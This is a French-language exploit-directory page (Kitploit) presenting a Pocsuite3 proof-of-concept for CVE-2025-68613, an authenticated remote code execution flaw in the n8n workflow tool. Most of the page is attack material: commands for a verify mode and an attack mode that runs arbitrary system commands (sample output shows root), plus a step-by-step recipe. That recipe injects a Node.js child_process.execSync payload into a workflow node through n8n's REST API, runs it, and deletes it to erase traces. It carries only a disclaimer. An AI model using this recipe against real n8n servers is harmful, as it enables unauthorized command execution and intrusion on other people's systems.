Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2025-68613 — Script de validation et d'exploitation de vulnérabilités basé sur le framework Pocsuite3, utilisé pour détecter la vulnérabilité d'exécution de code à distance après authentification (RCE) dans l'outil d'automatisation de workflows n8n. | Kitploit
Outils/GitHubGitHub/secjoker/cve-2025-68613
Analyse des VulnérabilitésExploitationExploitation d'Applications WebTests d'IntrusionCommandement et ContrôleRed TeamingDéveloppement de Charges Utiles
GitHubsecjoker/cve-2025-68613

CVE-2025-68613

Script de validation et d'exploitation de vulnérabilités basé sur le framework Pocsuite3, utilisé pour détecter la vulnérabilité d'exécution de code à distance après authentification (RCE) dans l'outil d'automatisation de workflows n8n.

Voir le dépôt
il y a 8 moisPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

🚀 n8n Authenticated RCE PoC (Pocsuite3)

CVE ID : CVE-2025-68613
Type : Exécution de code à distance authentifiée
Framework : Pocsuite3

Python Pocsuite3 License

Il s'agit d'un script de vérification et d'exploitation de vulnérabilité basé sur le framework Pocsuite3, conçu pour détecter la vulnérabilité d'exécution de code à distance (RCE) après authentification dans l'outil d'automatisation de workflows n8n. Ce script prend en charge deux modes : la vérification inoffensive (Verify) et l'exécution de commandes (Attack), avec une fonction de nettoyage automatique des traces de test.


⚙️ Paramètres

En plus des paramètres de base de Pocsuite3, ce script étend les paramètres personnalisés suivants, qui doivent être passés via --options lors de l'exécution :


🚀 Utilisation

Assurez-vous que pocsuite3 est installé (pip install pocsuite3) et enregistrez le script sous n8n_auth_rce.py.

1. Mode Vérification (Verify Mode)

En mode vérification, le script envoie un workflow contenant un calcul mathématique sécurisé (11111 + 22222) à la cible. Si le résultat renvoyé est 33333, cela prouve que le moteur JS peut être appelé de manière malveillante. Ce mode est inoffensif et n'exécute aucune commande système.

root@kitploit:~
pocsuite -r n8n_auth_rce.py -u http://target-n8n.com --verify --options '{"api_key": "YOUR_API_KEY_HERE"}'

Sortie attendue :

root@kitploit:~
[+] Vulnérable ! Expression JS exécutée. Résultat : 33333

2. Mode Attaque (Attack Mode)

Le mode attaque vous permet d'exécuter n'importe quelle commande système. La commande par défaut est id, mais vous pouvez personnaliser la commande via le paramètre cmd.

Exécution de la commande par défaut (id) :

root@kitploit:~
pocsuite -r n8n_auth_rce.py -u http://target-n8n.com --attack --options '{"api_key": "YOUR_API_KEY_HERE"}'

Exécution d'une commande personnalisée (ex : whoami) :

root@kitploit:~
pocsuite -r n8n_auth_rce.py -u http://target-n8n.com --attack --options '{"api_key": "YOUR_API_KEY_HERE", "cmd": "whoami"}'

Sortie attendue :

root@kitploit:~
[+] Commande 'whoami' exécutée :
root

🧩 Aperçu de la logique du script

Le flux d'exécution de ce PoC est conçu comme une opération bouclée afin de minimiser l'impact résiduel sur le système cible :

  1. Construction (Construction) : À l'aide de la api_key fournie, construisez un JSON de workflow malveillant contenant un nœud n8n-nodes-base.set.
  2. Injection (Injection) : Injectez la charge utile (code Node.js require('child_process').execSync(...)) dans le champ value du nœud.
  3. Déploiement (Déploiement) : Envoyez une requête POST à /rest/workflows pour créer un workflow temporaire et récupérez le workflow_id.
  4. Déclenchement (Déclenchement) : Envoyez une requête POST à /rest/workflows/{id}/run pour déclencher l'exécution du workflow, puis analysez le JSON renvoyé pour obtenir le résultat de la commande.
  5. Nettoyage (Nettoyage) : Que l'exploitation ait réussi ou non, une requête DELETE est envoyée à /rest/workflows/{id} pour supprimer le workflow temporaire, maintenant ainsi l'environnement propre.

⚠️ Avertissement (Disclaimer)

Veuillez lire attentivement avant utilisation

  1. Principe d'autorisation : Cet outil est destiné exclusivement aux professionnels de la cybersécurité disposant d'une autorisation explicite pour effectuer des tests de sécurité ou des vérifications de vulnérabilité sur le système cible.
  2. Activités illégales : Il est strictement interdit d'utiliser cet outil pour tout test d'intrusion non autorisé, toute action malveillante ou tout usage illégal.
  3. Responsabilité : Toute conséquence découlant de l'utilisation de cet outil (y compris, mais sans s'y limiter, les dommages système, la perte de données, les litiges juridiques) est de la seule responsabilité de l'utilisateur. Les développeurs et contributeurs déclinent toute responsabilité légale.
  4. Conformité : L'utilisateur doit se conformer aux lois et réglementations locales (telles que la loi sur la cybersécurité de la République populaire de Chine, etc.).
Télécharger l’outil
ParamètreObligatoireValeur par défautDescription
api_key✅-X-N8N-API-KEY de la cible (obligatoire pour l'authentification)
cmd❌idCommande système à exécuter en mode Attack